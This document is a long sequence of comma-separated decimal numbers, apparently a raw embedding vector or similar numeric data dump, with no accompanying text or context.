-0.0020762633066624403, 0.025193851441144943, 0.009301381185650826, -0.022406920790672302, -0.040326885879039764, 0.00009307912841904908, 0.011530925519764423, -0.03363825008273125, 0.0006444776663556695, 0.028649646788835526, -0.0091968709602952, -0.01399735826998949, 0.009378021582961082, 0.0042883893474936485, -0.021626580506563187, -0.007559549063444138, -0.0005190658266656101, -0.010095655918121338, 0.00047334274859167635, 0.03709404543042183, 0.026531578972935677, -0.008172674104571342, 0.0009205579990521073, 0.007110156584531069, 0.02038639783859253, -0.029875895008444786, -0.0035341763868927956, -0.009245642460882664, -0.05049918219447136, -0.013237920589745045, -0.017028145492076874, 0.019174082204699516, -0.0008151771617121994, -0.005856037605553865, -0.014492038637399673, 0.010248936712741852, -0.0070927380584180355, 0.018115049228072166, 0.010060818865895271, -0.009663681499660015, 0.039184242486953735, 0.004142075311392546, -0.03308086469769478, 0.005441481713205576, -0.0006714760675095022, 0.04085640236735344, 0.007838241755962372, 0.006845398340374231, 0.004974671173840761, -0.00034727767342701554, 0.0064900643192231655, -0.010924767702817917, 0.024845486506819725, 0.020748697221279144, 0.01644289121031761, -0.03784651681780815, 0.0325792171061039, 0.01700027659535408, -0.02884473092854023, -0.006308914162218571, -0.01847735047340393, 0.024051209911704063, -0.036731746047735214, 0.0088833412155509, -0.007489875890314579, -0.015537138096988201, 0.008332922123372555, -0.017362577840685844, 0.011224362999200821, 0.00201355735771358, 0.01217888668179512, -0.025653695687651634, -0.01370473112910986, 0.011050179600715637, 0.0009702002280391753, 0.02774389460682869, 0.0004334983532316983, 0.010262872092425823, -0.0014500748366117477, -0.02123641036450863, 0.013648992404341698, -0.0021703222300857306, -0.0030900093261152506, -0.02080443687736988, 0.017278969287872314, -0.0016477727331221104, -0.001544133760035038, -0.002992466790601611, 0.0017461861716583371, -0.0017435734625905752, -0.015801895409822464, 0.00545541662722826, 0.00016438536113128066, -0.007531679701060057, 0.02876112423837185, -0.02021918073296547, -0.010325578041374683, 0.026670925319194794, -0.016428954899311066, -0.01700027659535408, 0.007887013256549835, -0.012046507559716702, 0.005925711244344711, -0.011823552660644054, 0.01911834441125393, -0.012771109119057655, 0.011252231895923615, -0.010207133367657661, 0.003159682499244809, 0.023145457729697227, 0.0020274920389056206, -0.019522449001669884, -0.006239240989089012, -0.011314937844872475, 0.022852830588817596, -0.006253175437450409, -0.0010973538737744093, -0.01780848577618599, 0.004553147591650486, 0.011398546397686005, -0.017836354672908783, -0.019480643793940544, 0.010290740989148617, 0.005852553993463516, -0.006514450069516897, 0.014046129770576954, -0.006169567350298166, -0.003577722003683448, -0.005967515055090189, 0.003668297315016389, 0.002220835303887725, 0.036257967352867126, -0.0022905084770172834, 0.01186535693705082, -0.005758495070040226, -0.003149231430143118, -0.03645305335521698, 0.009635812602937222, 0.0060058352537453175, 0.009405890479683876, -0.01021410059183836, 0.018463414162397385, 0.026155343279242516, -0.005800299346446991, 0.004877128638327122, 0.006897652987390757, 0.02435777336359024, 0.0061869858764112, 0.003936539404094219, 0.015314183197915554, -0.005863005295395851, 0.018574891611933708, 0.011119852773845196, -0.012903488241136074, 0.01577402651309967, 0.007594385650008917, -0.00008899670501705259, 0.03394481539726257, -0.0019961390644311905, -0.00009487538773100823, -0.005768946371972561, 0.036397311836481094, -0.01708388514816761, 0.011684206314384937, -0.0022225771099328995, 0.0014108836185187101, 0.002537848660722375, -0.004953769035637379, 0.007078803610056639, 0.00811693537980318, -0.02508237585425377, 0.015091229230165482, -0.025597957894206047, 0.003528950735926628, -0.013265789486467838, 0.001718316925689578, -0.0031980029307305813, -0.020316723734140396, 0.007684960961341858, 0.012025604955852032, -0.009398923255503178, -0.008242347277700901, 0.00123670045286417, -0.005333488341420889, 0.010255904868245125, 0.004159493837505579, 0.018547022715210915, 0.004176912363618612, 0.004110722802579403, -0.013669894076883793, 0.013147344812750816, -0.02749307081103325, -0.01644289121031761, 0.0215708427131176, -0.02215609885752201, -0.009949342347681522, -0.017878159880638123, -0.009350151754915714, 0.009635812602937222, 0.010687878355383873, 0.009754257276654243, 0.013251855038106441, -0.019090473651885986, -0.0038564151618629694, 0.0006105119828134775, -0.007078803610056639, 0.021417561918497086, 0.022532332688570023, 0.027771763503551483, 0.007252987008541822, -0.010381316766142845, -0.005222011357545853, 0.0035306925419718027, -0.03269069641828537, 0.015746157616376877, 0.005619148723781109, -0.013920717872679234, -0.006340267136693001, 0.016247805207967758, -0.002867054892703891, -0.01602485030889511, 0.002018782775849104, 0.017627336084842682, -0.008472268469631672, 0.01683306135237217, 0.008709157817065716, -0.015927307307720184, -0.007239052094519138, -0.007664058823138475, -0.012931358069181442, 0.013913750648498535, -0.034028422087430954, -0.012868652120232582, 0.0016599654918536544, -0.0003609945997595787, -0.0027224828954786062, -0.0268520750105381, -0.013126443140208721, -0.018170787021517754, -0.0030273033771663904, -0.002295734127983451, -0.0006170438718982041, 0.008980883285403252, 0.008806700818240643, 0.007907915860414505, 0.031993962824344635, -0.014965817332267761, 0.006740888115018606, -0.006396005861461163, 0.0016817384166643023, 0.046374525874853134, -0.006145182065665722, -0.03377759829163551, -0.012589958496391773, 0.01433875784277916, -0.025820910930633545, 0.0009614910231903195, 0.0039539579302072525, -0.015300248749554157, 0.016610106453299522, 0.016178131103515625, -0.004828357137739658, -0.007719797547906637, -0.028259476646780968, 0.00596403144299984, -0.0020588450133800507, -0.02223970554769039, 0.007117123808711767, -0.004434703383594751, -0.005713207647204399, 0.02111099846661091, 0.002898407867178321, 0.025026636198163033, -0.01192806288599968, 0.016721583902835846, 0.021501168608665466, 0.02757667750120163, -0.007503810338675976, 0.009169001132249832, 0.02308971993625164, 0.008207510225474834, 0.01577402651309967, -0.011921095661818981, -0.014157607220113277, 0.004845775663852692, -0.014979751780629158, 0.013237920589745045, 0.014185476116836071, -0.005277749616652727, 0.00751774525269866, 0.005180207081139088, -0.003541143611073494, 0.0022173516917973757, 0.016303543001413345, -0.002497786423191428, 0.018296198919415474, -0.00593267846852541, 0.017752747982740402, -0.011941997334361076, -0.019229819998145103, -0.01211618073284626, -0.021124932914972305, 0.0009031397057697177, -0.0104649243876338, 0.015843700617551804, 0.008966948837041855, -0.005162789020687342, 0.012966194190084934, 0.022476594895124435, 0.023911863565444946, -0.007538647390902042, -0.010687878355383873, 0.006671214941889048, 0.014248182065784931, -0.01420637872070074, 0.009858766570687294, 0.013899816200137138, 0.0033913461957126856, -0.000029747217922704294, 0.018797846511006355, -0.013537514954805374, -0.004211748950183392, -0.015049424953758717, -0.0024455315433442593, 0.012471513822674751, -0.009120230562984943, 0.01864456571638584, -0.002501270268112421, -0.004462572745978832, -0.01733470894396305, -0.008695223368704319, 0.010708780959248543, 0.01262479554861784, -0.020038031041622162, -0.00469249440357089, -0.021807732060551643, 0.01797570288181305, -0.0036613300908356905, -0.01936916820704937, -0.021264279261231422, -0.002255671890452504, 0.022615941241383553, 0.0019769789651036263, 0.001286342623643577, 0.007113640196621418, -0.014492038637399673, -0.02097165212035179, 0.005162789020687342, -0.02292250469326973, 0.00004487937985686585, 0.011551827192306519, 0.006357685197144747, 0.011050179600715637, -0.014171541668474674, 0.01569041982293129, -0.010492793284356594, 0.0017906029243022203, 0.00039365392876788974, 0.0018724689725786448, 0.011886258609592915, -0.02795291319489479, -0.008033327758312225, 0.007204215507954359, 0.014924013055860996, 0.011349774897098541, 0.022392986342310905, 0.01408096682280302, -0.03230052441358566, -0.0019020801410079002, -0.0064726462587714195, -0.015871569514274597, -0.011642402037978172, 0.0011687689693644643, 0.016470760107040405, -0.003936539404094219, 0.001860276097431779, 0.017474055290222168, -0.009433760307729244, -0.000022262785932980478, 0.01970359869301319, -0.010869028978049755, -0.010959604755043983, -0.0012994064018130302, 0.012025604955852032, 0.026615187525749207, 0.014882208779454231, -0.00026737115695141256, 0.00643780967220664, -0.0002530010533519089, -0.0030778164509683847, -0.0019160147057846189, 0.014408431015908718, -0.02643403597176075, 0.008611615747213364, -0.009635812602937222, 0.007057901471853256, -0.011621500365436077, 0.0044068340212106705, -0.015077294781804085, -0.004354578908532858, -0.009364087134599686, -0.012171919457614422, 0.005566893611103296, 0.0005843844846822321, 0.03745634853839874, 0.012840782292187214, -0.004838807974010706, -0.0221979022026062, 0.019633926451206207, 0.022643810138106346, 0.004518311005085707, -0.005650501698255539, -0.002252188278362155, -0.010687878355383873, 0.010966571979224682, 0.026503710076212883, 0.027757829055190086, -0.001437881961464882, 0.015119098126888275, -0.02144543081521988, 0.023633170872926712, -0.008033327758312225, 0.003497597761452198, 0.017278969287872314, -0.004769134800881147, 0.0044068340212106705, 0.0062044039368629456, 0.014603516086935997, -0.010541564784944057, 0.0015450046630576253, 0.005500704050064087, 0.004518311005085707, 0.03288578242063522, -0.01637321710586548, 0.007608320564031601, 0.0023758583702147007, -0.003133554942905903, 0.0020605868194252253, -0.0009179452317766845, 0.0008269345271401107, 0.014924013055860996, -0.0085628442466259, 0.010221067816019058, 0.004849259275943041, -0.011071081273257732, -0.010485826060175896, 0.007657091598957777, 0.018463414162397385, 0.008709157817065716, 0.015718288719654083, 0.0033164473716169596, 0.011872324161231518, 0.012596925720572472, 0.006887202151119709, -0.002875763922929764, 0.007475941441953182, -0.02237905189394951, -0.001416109036654234, 0.0042709712870419025, -0.006918555125594139, -0.011105918325483799, 0.01040221843868494, 0.01520270574837923, 0.0029402116779237986, -0.015996981412172318, -0.024845486506819725, 0.012318233028054237, -0.007141509559005499, -0.005065246485173702, 0.0024124367628246546, 0.010109590366482735, -0.011280101723968983, 0.005716691259294748, -0.0123739717528224, -0.025639761239290237, -0.005333488341420889, 0.008395628072321415, -0.008165706880390644, -0.0247479435056448, 0.013781371526420116, -0.006514450069516897, -0.023438086733222008, 0.006643345579504967, 0.0048004877753555775, 0.003946990240365267, -0.01564861461520195, 0.01700027659535408, -0.000925783475395292, 0.0060371882282197475, -0.005730626173317432, -0.004016663879156113, -0.0024333386681973934, 0.00421871617436409, -0.012206755578517914, 0.021501168608665466, 0.007448072079569101, 0.018714237958192825, 0.0013838851591572165, 0.005908292718231678, -0.0010677428217604756, 0.007406267803162336, -0.021250344812870026, -0.0026963553391397, 0.01230429857969284, 0.022769222036004066, 0.006315881386399269, -0.002010073745623231, -0.009747290052473545, -0.0023688909132033587, 0.020079834386706352, -0.01970359869301319, 0.0012811170890927315, -0.02242085710167885, 0.012234625406563282, -0.0022539300844073296, 0.004570566117763519, 0.01644289121031761, 0.018045375123620033, -0.004190846811980009, -0.002771254163235426, -0.03642518073320389, -0.010318610817193985, -0.013335462659597397, -0.01357235200703144, 0.017097819596529007, 0.022211836650967598, 0.008353824727237225, -0.0028008650988340378, 0.00707183638587594, 0.005145370494574308, -0.0321333110332489, -0.010269839316606522, 0.004769134800881147, 0.005793332122266293, -0.01941097155213356, 0.010144427418708801, -0.019174082204699516, 0.012067409232258797, 0.014701059088110924, 0.01780848577618599, -0.015718288719654083, -0.014283019118010998, -0.0004315387923270464, 0.007684960961341858, -0.017878159880638123, -0.0376514308154583, -0.0004128140863031149, 0.011503055691719055, 0.02308971993625164, -0.005166272632777691, -0.016902733594179153, -0.01932736299932003, 0.003978343214839697, 0.015244510024785995, -0.01751585863530636, -0.012987096793949604, -0.010241969488561153, -0.0024159203749150038, 0.012652664445340633, 0.02076263353228569, -0.01737651228904724, 0.015565006993710995, -0.014924013055860996, 0.002891440410166979, 0.005911776330322027, 0.004382448270916939, 0.0008330309647135437, -0.003894735360518098, 0.006072024814784527, -0.009837864898145199, 0.00735749676823616, 0.013600220903754234, -0.0019891716074198484, -0.019982291385531425, -0.005319553893059492, 0.00019301672000437975, 0.011760846711695194, 0.021919209510087967, -0.017028145492076874, 0.002954146359115839, -0.008486203849315643, -0.00735749676823616, -0.03519893437623978, -0.0064726462587714195, -0.009677615948021412, -0.006253175437450409, 0.007218149956315756, 0.0006418649572879076, -0.013028900139033794, -0.005497220437973738, 0.001080806483514607, -0.012325200252234936, 0.0253750029951334, 0.0021598711609840393, 0.010680911131203175, -0.018742108717560768, -0.016164196655154228, 0.0033129637595266104, -0.02042820118367672, -0.012088310904800892, 0.009461629204452038, 0.0021476782858371735, 0.017919963225722313, -0.027353722602128983, -0.0006144311046227813, -0.02237905189394951, 0.01793389767408371, 0.021501168608665466, 0.02267168089747429, -0.00361604243516922, -0.003034270601347089, 0.004340644460171461, 0.0003239806683268398, 0.016178131103515625, 0.007921850308775902, -0.0027573194820433855, -0.008284150622785091, -0.014645320363342762, 0.009719420224428177, 0.0149100786074996, -0.008277183398604393, -0.012109213508665562, 0.01818472146987915, -0.018630631268024445, -0.007148476783186197, -0.0145895816385746, -0.01589943841099739, -0.01759946718811989, 0.0012036056723445654, -0.018031440675258636, -0.016651909798383713, -0.013976456597447395, -0.004737781826406717, 0.0008225799538195133, -0.04447941109538078, -0.02605780027806759, 0.021431496366858482, 0.010541564784944057, 0.023633170872926712, -0.008604648523032665, 0.0008953014621511102, 0.01560681127011776, 0.03650879114866257, -0.0008609002688899636, -0.006545803043991327, 0.0034070226829499006, 0.002482109935954213, 0.003192777279764414, -0.002168580424040556, -0.00694642448797822, 0.010290740989148617, 0.003751905169337988, -0.02550041489303112, -0.0037728073075413704, 0.022476594895124435, -0.021459365263581276, -0.009113263338804245, -0.00209368159994483, 0.014178508892655373, 0.0020692958496510983, 0.0003392217040527612, 0.002659776946529746, 0.006556254345923662, 0.0009292671456933022, -0.01720929704606533, 0.020065899938344955, 0.012582991272211075, 0.009447694756090641, -0.023368412628769875, -0.007852177135646343, -0.017738813534379005, -0.0005129693890921772, 0.0007816469296813011, 0.016944536939263344, -0.004135108087211847, 0.0026719695888459682, -0.003668297315016389, 0.0020083319395780563, 0.00447302358224988, 0.0006396876415237784, -0.005911776330322027, 0.01350964605808258, 0.0030151105020195246, -0.0066224439069628716, -0.02076263353228569, -0.0063646528869867325, 0.02186346985399723, 0.002948920940980315, -0.0047238473780453205, -0.00341050629504025, -0.02296430803835392, -0.007239052094519138, 0.0016939311753958464, 0.007252987008541822, -0.000716328271664679, -0.01635928265750408, -0.02766028605401516, -0.02063722163438797, 0.0007829532842151821, 0.00003788483809330501, 0.02288069948554039, 0.00875096209347248, 0.000012716731362161227, 0.012422743253409863, -0.022532332688570023, -0.020400332286953926, 0.0005308231920935214, 0.008841536939144135, 0.01666584424674511, 0.005079180933535099, -0.020790502429008484, -0.00024015503004193306, 0.0005647888756357133, 0.023883994668722153, 0.00780340563505888, -0.005943129304796457, -0.008123902603983879, -0.00298201572149992, -0.003358251415193081, 0.008144804276525974, 0.00021010843920521438, -0.008465301245450974, 0.005504187662154436, -0.016484694555401802, -0.0030551727395504713, -0.005019958596676588, 0.03544975817203522, -0.003398313419893384, 0.010074754245579243, 0.018156852573156357, 0.007671026512980461, 0.0008996560354717076, 0.013147344812750816, -0.010945669375360012, -0.006326332222670317, 0.0019247239688411355, 0.005605214275419712, -0.0028008650988340378, -0.0006688633584417403, -0.010729682631790638, -0.008848504163324833, 0.0020118155516684055, -0.017390446737408638, -0.001127835945226252, -0.0021981915924698114, 0.0011609307257458568, 0.014241214841604233, 0.026029931381344795, -0.0107854213565588, 0.008507105521857738, -0.01822652667760849, 0.013286691159009933, 0.0012715370394289494, 0.0012602151837199926, -0.0044660563580691814, 0.009273511357605457, 0.026838140562176704, -0.01818472146987915, 0.010353446938097477, 0.012123147957026958, 0.011210428550839424, 0.0011591889197006822, -0.013725632801651955, -0.015565006993710995, -0.007005646824836731, -0.020581481978297234, 0.0298201572149992, 0.0001016249880194664, 0.012081343680620193, -0.00241069495677948, -0.0003910411905962974, 0.012318233028054237, 0.005340455565601587, -0.011071081273257732, 0.027311919257044792, -0.0025587505660951138, 0.007482908666133881, 0.026113539934158325, -0.00710667297244072, 0.013962522149085999, -0.003246774198487401, 0.0015319408848881721, -0.005796815734356642, -0.007343561854213476, -0.005650501698255539, -0.007343561854213476, -0.002675453433766961, -0.04559418559074402, 0.006521417293697596, 0.001820213976316154, -0.014136705547571182, 0.0074550393037498, 0.007089254446327686, 0.025152048096060753, -0.01503549050539732, 0.010673943907022476, -0.0015328117879107594, -0.017738813534379005, 0.02026098594069481, 0.003703133901581168, 0.0010555499466136098, 0.012826847843825817, -0.0025430740788578987, 0.007315692491829395, -0.0008334664162248373, 0.013990391045808792, 0.006347234360873699, -0.004591468255966902, 0.0014343983493745327, -0.008667354471981525, -0.0003104814968537539, 0.0007045709062367678, 0.0044974093325436115, -0.000014696704056404997, -0.0007263437728397548, -0.0017435734625905752, -0.008158739656209946, 0.021375756710767746, 0.013934653252363205, 0.018421610817313194, -0.009127197787165642, -0.007489875890314579, -0.012039540335536003, -0.007935784757137299, 0.023716779425740242, 0.002886214992031455, 0.005194141995161772, -0.024134818464517593, 0.006841914728283882, -0.0069673266261816025, -0.004654174204915762, -0.01674945279955864, 0.00003587084574974142, -0.02152903936803341, -0.03882194310426712, 0.0038598987739533186, 0.022295445203781128, -0.00003812978320638649, -0.0019177566282451153, -0.017697008326649666, 0.014492038637399673, 0.02693568356335163, 0.02639223262667656, 0.004706428851932287, -0.008953014388680458, -0.0024019856937229633, 0.012826847843825817, 0.0010085204849019647, -0.01594124361872673, 0.0019282075809314847, -0.007524712476879358, 0.01171207521110773, 0.015746157616376877, 0.0029802739154547453, 0.007761601824313402, -0.008353824727237225, -0.009120230562984943, -0.009900570847094059, -0.0010607754811644554, 0.003276385134086013, 0.004264003597199917, 0.013969489373266697, 0.01991261914372444, -0.0016721583670005202, -0.011085016652941704, 0.005228978581726551, -0.0068175289779901505, -0.016219936311244965, -0.017390446737408638, -0.017320772632956505, -0.02423236146569252, 0.019006866961717606, 0.008674321696162224, 0.0019125310936942697, -0.00710318936035037, 0.012443644925951958, 0.012206755578517914, 0.007859144359827042, -0.0005504188011400402, -0.005472834687680006, 0.00656670518219471, 0.014826470986008644, 0.006632894743233919, 0.010207133367657661, -0.00688371853902936, -0.0029837575275450945, 0.01619206741452217, -0.009440727531909943, -0.006988228298723698, 0.03517106547951698, -0.0034488264936953783, -0.016568301245570183, 0.008465301245450974, 0.0025761688593775034, 0.015369921922683716, 0.021556908264756203, -0.014756796881556511, -0.014436299912631512, 0.0032101955730468035, 0.009371054358780384, 0.011189525946974754, 0.008876373991370201, -0.0008134353556670249, 0.011691173538565636, 0.010457957163453102, 0.018895389512181282, 0.006315881386399269, -0.009621878154575825, -0.008911210112273693, -0.007002163212746382, 0.008507105521857738, -0.007977589033544064, 0.012471513822674751, -0.016275674104690552, 0.006942940875887871, 0.010297708213329315, 0.018895389512181282, -0.022476594895124435, 0.006061573978513479, -0.0001310728257521987, 0.030600497499108315, -0.008409562520682812, -0.001450945739634335, -0.004650690592825413, -0.021222475916147232, 0.0012906972551718354, 0.008521039970219135, -0.0021198091562837362, -0.010485826060175896, -0.016219936311244965, -0.019592121243476868, -0.015119098126888275, -0.003643911797553301, 0.009217772632837296, 0.002910600509494543, 0.0228388961404562, 0.0123739717528224, -0.004326709546148777, 0.014192444272339344, -0.010827225632965565, -0.015342053025960922, 0.006671214941889048, 0.025988128036260605, -0.008737027645111084, 0.0008500138064846396, -0.023061851039528847, -0.004570566117763519, -0.0101513946428895, 0.025653695687651634, 0.012541187927126884, 0.013969489373266697, 0.012248559854924679, 0.011593631468713284, 0.012833815068006516, -0.00016580059309490025, 0.008089065551757812, 0.010325578041374683, 0.001659094588831067, 0.014798601157963276, -0.012387906201183796, -0.00995630957186222, 0.006479613482952118, 0.025152048096060753, -0.005974482279270887, 0.008911210112273693, -0.026169277727603912, -0.02359136752784252, -0.01594124361872673, -0.0025204303674399853, -0.007949719205498695, -0.017836354672908783, -0.008444399572908878, -0.011022310703992844, 0.0018167303642258048, 0.02246266044676304, -0.002515204716473818, -0.011391578242182732, -0.002792156068608165, -0.011210428550839424, 0.0069255223497748375, -0.019564252346754074, 0.027729958295822144, 0.020832305774092674, -0.0012976645957678556, -0.00786611158400774, 0.003880800912156701, 0.010137460194528103, 0.007496843114495277, -0.010736649855971336, -0.017139622941613197, 0.01945277489721775, 0.01805930957198143, -0.0005168885109014809, 0.011071081273257732, -0.021877404302358627, -0.000009559661521052476, 0.014129738323390484, 0.002010073745623231, -0.013356364332139492, -0.017710942775011063, 0.009245642460882664, 0.01097353920340538, -0.006315881386399269, -0.013098573312163353, -0.0016381925670430064, 0.02693568356335163, 0.009175969287753105, -0.012192821130156517, 0.016944536939263344, -0.018853584304451942, 0.02541680634021759, 0.033136602491140366, -0.00437896465882659, 0.016651909798383713, 0.01463138498365879, -0.008123902603983879, 0.022490529343485832, -0.005984933581203222, -0.016275674104690552, 0.01338423416018486, -0.005775913596153259, -0.0010642590932548046, 0.009942375123500824, -0.01936916820704937, -0.004267487209290266, 0.0008595939143560827, 0.0007407139055430889, 0.009733354672789574, -0.006333299912512302, -0.007259954232722521, -0.012889553792774677, 0.011774781160056591, 0.004323225934058428, -0.003978343214839697, 0.005667920224368572, -0.03177100792527199, 0.020665090531110764, 0.012694468721747398, -0.0032171630300581455, 0.008667354471981525, 0.0033721858635544777, 0.013098573312163353, -0.010374348610639572, 0.031993962824344635, -0.00279041426256299, 0.002637133002281189, -0.023911863565444946, -0.004427735693752766, -0.013474809005856514, 0.011698140762746334, -0.00021914418903179467, -0.012074376456439495, 0.008291118778288364, -0.0008365146350115538, -0.0005839490331709385, -0.0031945190858095884, 0.005619148723781109, -0.02859390713274479, 0.004034081939607859, 0.015133032575249672, -0.01103624515235424, -0.0007659704424440861, -0.020414266735315323, -0.0029645974282175303, 0.0071833133697509766, -0.009245642460882664, 0.005277749616652727, -0.025235656648874283, 0.0028409273363649845, -0.0035655293613672256, 0.006660764105618, -0.010757551528513432, 0.0015554556157439947, -0.005469351075589657, 0.02144543081521988, 0.0058107501827180386, 0.003251999616622925, 0.009566139429807663, -0.011537892743945122, 0.018978996202349663, -0.030293935909867287, -0.006625927519053221, -0.006228789687156677, 0.007531679701060057, -0.004103755112737417, -0.020247049629688263, 0.011029277928173542, 0.011948964558541775, -0.021682320162653923, -0.019090473651885986, 0.019466709345579147, 0.013558417558670044, -0.030600497499108315, -0.004702945239841938, -0.007002163212746382, 0.019633926451206207, -0.002990724751725793, -0.008911210112273693, -0.008479236625134945, 0.007873078808188438, 0.012464546598494053, 0.0145895816385746, -0.01129403617233038, -0.014366626739501953, 0.005957064218819141, -0.007120607420802116, 0.0033112219534814358, 0.032662827521562576, 0.007239052094519138, 0.006963842548429966, -0.023284804075956345, 0.003461019368842244, 0.008939079940319061, -0.007887013256549835, 0.019996225833892822, 0.0028200254309922457, 0.00013575400225818157, -0.00925957690924406, -0.010750584304332733, -0.0022504464723169804, -0.0029942085966467857, 0.007956686429679394, 0.020024096593260765, -0.013837110251188278, 0.010032949969172478, 0.005824685096740723, 0.016261739656329155, 0.010325578041374683, 0.01059730350971222, 0.014519908465445042, 0.009092360734939575, -0.000054568317864323035, 0.03388907387852669, -0.0035742383915930986, -0.00469249440357089, -0.02101345732808113, -0.009823930449783802, 0.028384888544678688, -0.0006810561753809452, 0.0003834206727333367, 0.005845586769282818, 0.011091983877122402, -0.023911863565444946, -0.0021703222300857306, 0.004901513922959566, 0.01895112730562687, -0.0030551727395504713, 0.020456070080399513, -0.002260897308588028, -0.016387151554226875, 0.006706051528453827, 0.011558794416487217, 0.014728927984833717, -0.013537514954805374, 0.0009127197554334998, 0.006765273865312338, -0.02973654866218567, -0.004849259275943041, 0.02109706401824951, -0.0037937092129141092, -0.015662549063563347, -0.006291495636105537, -0.006340267136693001, 0.006044155452400446, 0.01631747931241989, 0.02173805795609951, 0.02118067257106304, -0.004999056458473206, 0.0027729959692806005, 0.012004703283309937, -0.01670764945447445, -0.01741831563413143, 0.0015667774714529514, 0.017474055290222168, -0.02562582679092884, 0.001699156709946692, 0.0037240360397845507, 0.016484694555401802, -0.0007973234169185162, 0.008764896541833878, -0.017153557389974594, -0.002469917293637991, 0.0035376599989831448, 0.01872817426919937, 0.00831202045083046, -0.004337160848081112, 0.0053439391776919365, -0.004075885750353336, -0.0077546341344714165, -0.004079369828104973, -0.009022687561810017, 0.009092360734939575, -0.009440727531909943, 0.011085016652941704, 0.008569811470806599, 0.0005769816925749183, 0.009245642460882664, 0.0095173679292202, 0.025890585035085678, -0.0139555549249053, -0.0040305983275175095, -0.013816208578646183, -0.005281233228743076, 0.006904620677232742, 0.005821201018989086, 0.008061196655035019, -0.006166083738207817, -0.014408431015908718, -0.007155444007366896, 0.008123902603983879, 0.008214477449655533, -0.010471891611814499, -0.023870060220360756, 0.0011931546032428741, 0.010562466457486153, -0.010708780959248543, -0.002532623242586851, 0.0068663000129163265, -0.030098849907517433, -0.013558417558670044, -0.002644100459292531, 0.001376046915538609, 0.021166738122701645, -0.012548155151307583, 0.010158361867070198, 0.015467464923858643, 0.02182166650891304, -0.005539024714380503, -0.022058555856347084, 0.005953580606728792, 0.006371620111167431, 0.012931358069181442, -0.021835600957274437, -0.013189149089157581, -0.002562234178185463, -0.009656714275479317, -0.007921850308775902, 0.012722337618470192, -0.007057901471853256, 0.01764127053320408, 0.013642025180161, -0.013544482178986073, -0.004396383184939623, 0.004309291485697031, 0.014519908465445042, 0.006747855804860592, 0.005786364432424307, 0.015244510024785995, 0.010235002264380455, 0.018365873023867607, -0.013342429883778095, 0.01751585863530636, 0.023493824526667595, -0.003203228348866105, 0.04562205448746681, 0.02194707840681076, 0.015704354271292686, 0.02152903936803341, 0.0029367280658334494, -0.008214477449655533, -0.028315214440226555, -0.005532057024538517, -0.013899816200137138, 0.0011757363099604845, 0.02105526067316532, -0.002959371777251363, 0.017487989738583565, 0.007817340083420277, 0.021124932914972305, 0.020901979878544807, 0.0064134239219129086, 0.030907059088349342, -0.0057619791477918625, 0.021961012855172157, 0.0024019856937229633, 0.024929093196988106, 0.002874022116884589, -0.014352692291140556, -0.01249938365072012, -0.027172572910785675, 0.013523580506443977, 0.033220212906599045, 0.0020396849140524864, -0.015230575576424599, -0.0019839461892843246, -0.014937947504222393, -0.018853584304451942, -0.014924013055860996, 0.022281508892774582, 0.00189511280041188, 0.0051000830717384815, 0.006235756911337376, 0.0030638817697763443, 0.010130492970347404, 0.0011827036505565047, -0.01957818679511547, -0.011642402037978172, 0.008207510225474834, -0.009148099459707737, 0.003936539404094219, -0.013467841781675816, -0.001161801628768444, -0.01970359869301319, 0.0014465911081060767, -0.02038639783859253, -0.001910789287649095, -0.0017322514904662967, -0.004065434914082289, -0.020205246284604073, -0.02084624022245407, -0.008242347277700901, 0.015885503962635994, 0.0027451266068965197, -0.011809618212282658, 0.020121637731790543, -0.019606055691838264, -0.002025750232860446, -0.021584777161478996, -0.005511155351996422, -0.002010073745623231, 0.015565006993710995, -0.019522449001669884, 0.0011966383317485452, 0.012206755578517914, -0.0008034197962842882, -0.007110156584531069, -0.013927685096859932, -0.012346101924777031, -0.017390446737408638, 0.0025988128036260605, -0.010666976682841778, 0.0016364507609978318, 0.014380562119185925, -0.026197146624326706, 0.003100460162386298, -0.004365030210465193, 0.013398168608546257, -0.005535540636628866, 0.005768946371972561, 0.013607188127934933, -0.01002598274499178, -0.004706428851932287, 0.00507569732144475, -0.001376046915538609, 0.01822652667760849, 0.015355987474322319, -0.023075785487890244, -0.010297708213329315, -0.014164574444293976, -0.0018655016319826245, 0.002541332272812724, -0.015578941442072392, -0.003283352591097355, 0.02055361308157444, 0.0024594662245362997, -0.01759946718811989, -0.007984556257724762, 0.012576024048030376, -0.00875792931765318, 0.0025674598291516304, 0.02233724854886532, 0.0029193097725510597, -0.024329904466867447, 0.009155066683888435, -0.0013359847944229841, 0.006180018652230501, -0.014826470986008644, -0.011217395775020123, -0.009162033908069134, -0.014192444272339344, 0.0029959504026919603, -0.01446416974067688, -0.005598246585577726, -0.016331413760781288, -0.0024646916426718235, 0.008667354471981525, 0.003915637265890837, -0.0011382868979126215, 0.010743617080152035, 0.0017322514904662967, -0.004650690592825413, 0.000009396365385327954, -0.0021285181865096092, 0.028217671439051628, 0.009210805408656597, 0.012896521016955376, 0.008061196655035019, -0.008841536939144135, -0.017543727532029152, 0.014882208779454231, -0.007155444007366896, 0.0177666824311018, 0.0019038219470530748, 0.00198220438323915, 0.00640645669773221, -0.01755766198039055, -0.01801750622689724, -0.0008648193906992674, -0.028788993135094643, -0.00548676960170269, -0.001922982046380639, 0.022142162546515465, 0.012534219771623611, 0.0030429798644036055, -0.0029889829456806183, 0.0001886621321318671, -0.004657657817006111, -0.01433875784277916, 0.007176346145570278, 0.0025674598291516304, -0.004594951868057251, -0.004493925720453262, 0.003333865664899349, 0.009977211244404316, -0.014157607220113277, 0.046708956360816956, 0.02630862407386303, -0.0013891106937080622, 0.009440727531909943, -0.007155444007366896, -0.0021859987173229456, 0.004615853540599346, -0.01860276237130165, -0.01619206741452217, 0.011586664244532585, -0.012826847843825817, -0.005545991938561201, 0.009607942774891853, -0.022978242486715317, 0.015369921922683716, -0.02109706401824951, 0.0035115324426442385, 0.012952259741723537, 0.003940023016184568, -0.006260142661631107, 0.0010085204849019647, -0.013293658383190632, 0.008430465124547482, -0.020860174670815468, 0.009015720337629318, 0.014965817332267761, 0.0035080488305538893, 0.02177986316382885, 0.0038668662309646606, -0.03464154526591301, 0.008785798214375973, -0.010318610817193985, 0.003354767570272088, 0.0013499194756150246, 0.01577402651309967, 0.005998868029564619, -0.025904519483447075, 0.018588826060295105, -0.0043476116843521595, -0.04746142774820328, -0.009782126173377037, 0.009726387448608875, 0.0058873905800282955, -0.004354578908532858, -0.00529865175485611, -0.009210805408656597, -0.02593238838016987, -0.011287068948149681, 0.0039713759906589985, 0.010095655918121338, -0.00405846768990159, 0.007322660181671381, 0.00485274288803339, -0.013377266936004162, -0.0036926830653101206, -0.009851799346506596, -0.009371054358780384, -0.008298086002469063, 